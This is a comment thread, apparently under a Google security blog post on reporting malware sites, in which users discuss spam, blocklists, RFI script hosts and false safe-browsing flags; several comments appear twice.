Has Google considered protecting the interest, in the US, of the majority at the expense of the minority of users? From the Google search page, not the advance search, leave .cn and .ru domains out of the search by default. The down side is that the iThugs will keep registering to other domains. However, that will be time and profit consuming. Also, their bot network will have to go through the seeding process all over again, this will buy Google the time it needs to establish protection from iThugs.
This is bad... whole world relies on google and now google is going bad! I had been a victim of this, one of friends was using my box and opened malware sites refrenced from google... It took me several days to dis-infect my lappy back! I've written an article explaining details abt malware that got into... http://www.taranfx.com/msg/47.php
Asking for help against malware is certainly a good initiative. But why don't you ask for similar help against the horrendous number of domain squatters and their link farms? They are filling the Web with useless autogenerated garbage, and with material shamelessly stolen from legitimate sites. Lots of people would be glad to pitch in against them! But I won't hold my breath, seeing how Google instead encourages their shady practices...
If you have Zlob Trojan ActiveX Malware domains plese forward them to admin at phsdl dot com so I can add them to http://www.phsdl.net/project_honeypot.php
Then an Internet user will be able to search Google with domainname.com Spam and it will be returned in the search results under PHSDL. A user then can take caution in going to that domain.
Maybe you also need to make SURE you provide a good means for disputing reports. I got hit by your "stopbadware" system on my blog, which has NO malware anywhere, and it's been a month and I still haven't received clearance from Google.
Your one-way style of communications is unimpressive.
I run PHSDL not StopBadware, but the best practices are similar.
On my incubation forum, Spammers post messages with links to malware. if you click on those links Zlob Trojan ActiveX Malware will be downloaded to your computer.
Maybe the reason that you blog got Malware status from Google is because you left the Malware posts on your blog.
You need to remove those posts right a way.
I recommend udopting some kind of anti Spam filter technology that will prevent Spammers from abusing your forum or blog.
PHSDL is one type of Spam filter techology, but there are others like Akismet, Karma, captcha, CSS-fix, and renaming your blog submission fields in the script.
The method that you will use will depend what type of comment Spam you trying to stop.
PHSDL Spam Filter is primaraly to stop Malware domain Spam, while Akismet and Karma are more broad and will stop off topic Spam, but may prevent real commentators from posting also, because of false positive prone.
It is apparent to anyone using Google Blog Search that the bad guys are using Blogspot and Google Blog Search as a training ground for SEO and cache poisoning.
I recommend that Google takes a more more aggressive approach to cutting spamming on Blogspot. Reporting spam found via Google Blog Search needs to be made much easier and to become a natural part of a Google Blog searcher's activities. A simple to find link for reporting spam would be a good start.
Currently robots churn out huge numbers of blogs and blog posts in order to assess their search term/search position success. This needs to be foiled ASAP. On Blogspot the rate a which blogs are created and postings are made needs to be throttled to a level that only humans can achieve.
Best of luck with your efforts on the security clampdown.
I second that! I am in Japan now, and have my Windows OS languages for non unicode is configured to Japanese, because of the mobile synchronization software requires it.
So all the links for Blospot are in Japanese. I cannot read Japanese, so I do not know what link to click to report Spam to Blogspot.
Actually before I turned unicode to Japanese, I think the links were still in Japanese.
This is a very well documentted problem that blogspot refuses to addrress. Let the users chose the language!
Even reporting the bad accounts this way does not close them by Blogspot right a way, but the data compiled for algorithmic action.
As far as security - Spam prevention, Google Groups uses UnSpam data for blocking Spam to Google Groups, why Blogpost cannot remove accounts if a url on Blogsopt account flagged as one from UnSpam Projectt Hoheny Pot database, after manual verification that it is abusive?
I developed/developing a website called Engix ( hosted at http://www.engix.co.uk) taht lets people make campaigns using rich content using various GData apis. There is always copyright issues involved for example while using a photo for one from a public picasa album. How can that be circumvented? Can u include photo credits beside every photo u use and get away with it? As you fill the gaps with malware, copyright issues are not far behind to be addressed. They're (I think) even more important from a service provider's point of view. Correct me if I'm wrong.
This is not exactly a security issue, but there needs to be an official Google blog to concer this. It is very sensitive and debatable who owns what, and for Google to get involved beyond DMCA may not be fesable.
Please follow these Official Google links, which I think can help you.
There is nothing amyone can do from having these sites link to your Website, except you can set up deny referral host access in your .htaccess file under Apache.
But if you going to deny all the domains that are on PHSDL you will have to use a CGI script to do the processing or an MySQL include in your .htacess
But for your case having only a few domains that leach to your site, just add them as denied in .htaccess
In addition to the sites that host malware targeted at web surfers, there are thousands of sites, including university and government sites, which host malicious scripts that are being used to attack OTHER WEBSITES via Remote File Inclusion (RFI) requests.
These scripts are unlikely to be encountered by either web surfers or Googlebot because they are hidden in the directory structures of their host servers and, by design, have no inbound links by which to find them. These host sites often aren't badware-flagged, but they should be because a) they are malicious, and b) in the case of hacked sites, the webmasters need to be notified.
The list of URLs of the remote scripts being used in RFI attacks on my small website in the past few months is close to reaching 1000 entries, and the daily number of new sites being used in the attacks is rapidly increasing.
The problem? The reporting form at http://www.google.com/safebrowsing/report_badware/ only allows entering 1 website at a time.
Would it be possible to expand that form to a multi-line edit control so multiple sites can be reported at once? I have no objection to the captcha, but entering 1000 sites 1 at a time is out of the question. A one-at-a-time form cannot possibly be expected to deal with the volume of badware sites that actually exist. It basically acts as a barrier that inhibits reporting.
It would be impossible to misuse the form to try to damage an innocent website. There would be no harm done to any site with no badware on it. At worst, any abuse would only result in some extra crawling by the Google badware bots.
Going after these "quiet" malicious script-hosting sites is important because it is how most of the malicious sites are created that then go on to target end-users. If these script sites were dealt with more efficiently, it would come closer to attacking the real problem at its source.
Now we are talking, this is a good move from Google to fight back. The campaign against IFRAME attacks is still on. I've compiled a check-list for system admins to prevent the side-effects of visiting the malicious domains.
I'd like to know where to go to report when a site is NOT a malware site for Google.
I keep getting a notice that my newspaper site's /local link is a "reported attack site" and EVERY time I go there to read my local news, I have to go through a "yes this site is okay" link and then stop Firefox from preventing my page from loading. I don't want to turn off my filters for everything just so that i can read the online Seattle PI!
Our company site has been block when navigating with Google Chrome. Last night and this morning we have been doing tests on the site that google safe browsing detected as a site with malicious software and I could not find evidence to corroborate the google report. I have made you a brief summary.
[+] Scripts. Js with malicious code: NO [+] Dynamic Content ASP: Safe [+] SWF vulnerable to relaying attacks: NO [+] Static content HTM: Safe
Additionally, we has mounted a virtual machine on which we monitored processes, libraries, BHO's, Windows registry files, pipes and connections. The outcome of navigating the site, have not found evidenced malicious code in the virtual system. Moreover, all connections have been relayed to an intermediate proxy for a manual review and no symptoms of infection have been found.
Google how can we solve this....YOU ARE FALSELY BLOCKING OUR SITE!
32 comments :
I come with gifts :P
Just tossed together a custom button for Google's toolbar to make the reporting process a bit quicker.
"[The custom button] breaks down an eight click, one seek, one drag, and captcha entering process into two clicks and the captcha."
More info w/ install url
To be fair - you should at least acknowledge the Security Report that prompted you to enact this policy.
If something stimulates you into action - it is only ethical to give them credit
There is great shame in learning from the criticisms of other, and accepting an oversight
Here is the Report for Reference
We are all human.
Has Google considered protecting the interest, in the US, of the majority at the expense of the minority of users? From the Google search page, not the advance search, leave .cn and .ru domains out of the search by default. The down side is that the iThugs will keep registering to other domains. However, that will be time and profit consuming. Also, their bot network will have to go through the seeding process all over again, this will buy Google the time it needs to establish protection from iThugs.
This is bad... whole world relies on google and now google is going bad!
I had been a victim of this, one of friends was using my box and opened malware sites refrenced from google...
It took me several days to dis-infect my lappy back!
I've written an article explaining details abt malware that got into...
http://www.taranfx.com/msg/47.php
Asking for help against malware is certainly a good initiative. But why don't you ask for similar help against the horrendous number of domain squatters and their link farms? They are filling the Web with useless autogenerated garbage, and with material shamelessly stolen from legitimate sites. Lots of people would be glad to pitch in against them! But I won't hold my breath, seeing how Google instead encourages their shady practices...
If you have Zlob Trojan ActiveX Malware domains plese forward them to admin at phsdl dot com so I can add them to
http://www.phsdl.net/project_honeypot.php
Then an Internet user will be able to search Google with domainname.com Spam and it will be returned in the search results under PHSDL. A user then can take caution in going to that domain.
Igor Berger
PHSDL
Administrator
www.phsdl.net
Maybe you also need to make SURE you provide a good means for disputing reports. I got hit by your "stopbadware" system on my blog, which has NO malware anywhere, and it's been a month and I still haven't received clearance from Google.
Your one-way style of communications is unimpressive.
I run PHSDL not StopBadware, but the best practices are similar.
On my incubation forum, Spammers post messages with links to malware. if you click on those links Zlob Trojan ActiveX Malware will be downloaded to your computer.
Maybe the reason that you blog got Malware status from Google is because you left the Malware posts on your blog.
You need to remove those posts right a way.
I recommend udopting some kind of anti Spam filter technology that will prevent Spammers from abusing your forum or blog.
PHSDL is one type of Spam filter techology, but there are others like Akismet, Karma, captcha, CSS-fix, and renaming your blog submission fields in the script.
The method that you will use will depend what type of comment Spam you trying to stop.
PHSDL Spam Filter is primaraly to stop Malware domain Spam, while Akismet and Karma are more broad and will stop off topic Spam, but may prevent real commentators from posting also, because of false positive prone.
Please visit StopBadware.org and request to have your Website reviewd.
http://www.stopbadware.org/home/reviewinfo?searchtext=organizers
It is apparent to anyone using Google Blog Search that the bad guys are using Blogspot and Google Blog Search as a training ground for SEO and cache poisoning.
I recommend that Google takes a more more aggressive approach to cutting spamming on Blogspot. Reporting spam found via Google Blog Search needs to be made much easier and to become a natural part of a Google Blog searcher's activities. A simple to find link for reporting spam would be a good start.
Currently robots churn out huge numbers of blogs and blog posts in order to assess their search term/search position success. This needs to be foiled ASAP. On Blogspot the rate a which blogs are created and postings are made needs to be throttled to a level that only humans can achieve.
Best of luck with your efforts on the security clampdown.
I second that! I am in Japan now, and have my Windows OS languages for non unicode is configured to Japanese, because of the mobile synchronization software requires it.
So all the links for Blospot are in Japanese. I cannot read Japanese, so I do not know what link to click to report Spam to Blogspot.
Actually before I turned unicode to Japanese, I think the links were still in Japanese.
This is a very well documentted problem that blogspot refuses to addrress. Let the users chose the language!
Even reporting the bad accounts this way does not close them by Blogspot right a way, but the data compiled for algorithmic action.
As far as security - Spam prevention, Google Groups uses UnSpam data for blocking Spam to Google Groups, why Blogpost cannot remove accounts if a url on Blogsopt account flagged as one from UnSpam Projectt Hoheny Pot database, after manual verification that it is abusive?
Blogspot is not user friendly!
This is useful and it is in English.
Report
BlogSpot Spam to Google
I developed/developing a website called Engix ( hosted at http://www.engix.co.uk) taht lets people make campaigns using rich content using various GData apis. There is always copyright issues involved for example while using a photo for one from a public picasa album. How can that be circumvented? Can u include photo credits beside every photo u use and get away with it?
As you fill the gaps with malware, copyright issues are not far behind to be addressed. They're (I think) even more important from a service provider's point of view. Correct me if I'm wrong.
Balamurali Menon
This is not exactly a security issue, but there needs to be an official Google blog to concer this. It is very sensitive and debatable who owns what, and for Google to get involved beyond DMCA may not be fesable.
Please follow these Official Google links, which I think can help you.
Google Help Copyright
How to report Copyright infringment to Google
How to report DMCA violation to Google
Google Help on DMCA
Thank you,
Igor
Thanks dude!!
Appreciated!
These are Zlob Trojan Mawlare domains Websites.
You can see them on PHSDL Malware and redirect domains public list
PHSDL Malare and redirect domains public list
There is nothing amyone can do from having these sites link to your Website, except you can set up deny referral host access in your .htaccess file under Apache.
But if you going to deny all the domains that are on PHSDL you will have to use a CGI script to do the processing or an MySQL include in your .htacess
But for your case having only a few domains that leach to your site, just add them as denied in .htaccess
Please lookup the Apache syntax for doing so.
Thank you,
igor
Hi the phishing site submission page is return 404 error. Please confirm that you are receiving the submissions.
http://www.google.com/safebrowsing/report_phish/
Eric Appelboom
Recently I was read about new threats here:
http://scforum.info/index.php/board,17.0.html
Keep on guys!!!
In addition to the sites that host malware targeted at web surfers, there are thousands of sites, including university and government sites, which host malicious scripts that are being used to attack OTHER WEBSITES via Remote File Inclusion (RFI) requests.
These scripts are unlikely to be encountered by either web surfers or Googlebot because they are hidden in the directory structures of their host servers and, by design, have no inbound links by which to find them. These host sites often aren't badware-flagged, but they should be because a) they are malicious, and b) in the case of hacked sites, the webmasters need to be notified.
The list of URLs of the remote scripts being used in RFI attacks on my small website in the past few months is close to reaching 1000 entries, and the daily number of new sites being used in the attacks is rapidly increasing.
The problem? The reporting form at http://www.google.com/safebrowsing/report_badware/ only allows entering 1 website at a time.
Would it be possible to expand that form to a multi-line edit control so multiple sites can be reported at once? I have no objection to the captcha, but entering 1000 sites 1 at a time is out of the question. A one-at-a-time form cannot possibly be expected to deal with the volume of badware sites that actually exist. It basically acts as a barrier that inhibits reporting.
It would be impossible to misuse the form to try to damage an innocent website. There would be no harm done to any site with no badware on it. At worst, any abuse would only result in some extra crawling by the Google badware bots.
Going after these "quiet" malicious script-hosting sites is important because it is how most of the malicious sites are created that then go on to target end-users. If these script sites were dealt with more efficiently, it would come closer to attacking the real problem at its source.
Now we are talking, this is a good move from Google to fight back. The campaign against IFRAME attacks is still on. I've compiled a check-list for system admins to prevent the side-effects of visiting the malicious domains.
http://extremesecurity.blogspot.com/2008/03/iframe-attacks-actions-to-be-taken.html
and
http://extremesecurity.blogspot.com/2008/03/ie-activex-security-101.html
good luck
Why not distribute a browser plugin that scans, warns the user and sends the url back to Google?
That way we all benefit and we all contribute.
I'd like to know where to go to report when a site is NOT a malware site for Google.
I keep getting a notice that my newspaper site's /local link is a "reported attack site" and EVERY time I go there to read my local news, I have to go through a "yes this site is okay" link and then stop Firefox from preventing my page from loading. I don't want to turn off my filters for everything just so that i can read the online Seattle PI!
Where do I report that this site is legitimate?
Ripoff report downloads 2 hunks of malware and 1 trojan.
WARNING WARNING WARNING
There is a hidden worm/virus in a Flash download that appears if you click on one of "CNN's Top Ten Stories."
A quick check reveals the source to be somewhere in the Bahamas. This danger was first brought up by CNET a week or so ago.
Google should immediately shut down and delete all posts from "CNN Top Ten" that do not originate from CNN legitimately.
Charles
Google SafeBrowsing has False Positives!:
Our company site has been block when navigating with Google Chrome.
Last night and this morning we have been doing tests on the site that google safe browsing detected as a site with malicious software and I could not find evidence to corroborate the google report. I have made you a brief summary.
[+] Scripts. Js with malicious code: NO
[+] Dynamic Content ASP: Safe
[+] SWF vulnerable to relaying attacks: NO
[+] Static content HTM: Safe
Additionally, we has mounted a virtual machine on which we monitored processes, libraries, BHO's, Windows registry files, pipes and connections.
The outcome of navigating the site, have not found evidenced malicious code in the virtual system. Moreover, all connections have been relayed to an intermediate proxy for a manual review and no symptoms of infection have been found.
Google how can we solve this....YOU ARE FALSELY BLOCKING OUR SITE!
Post a Comment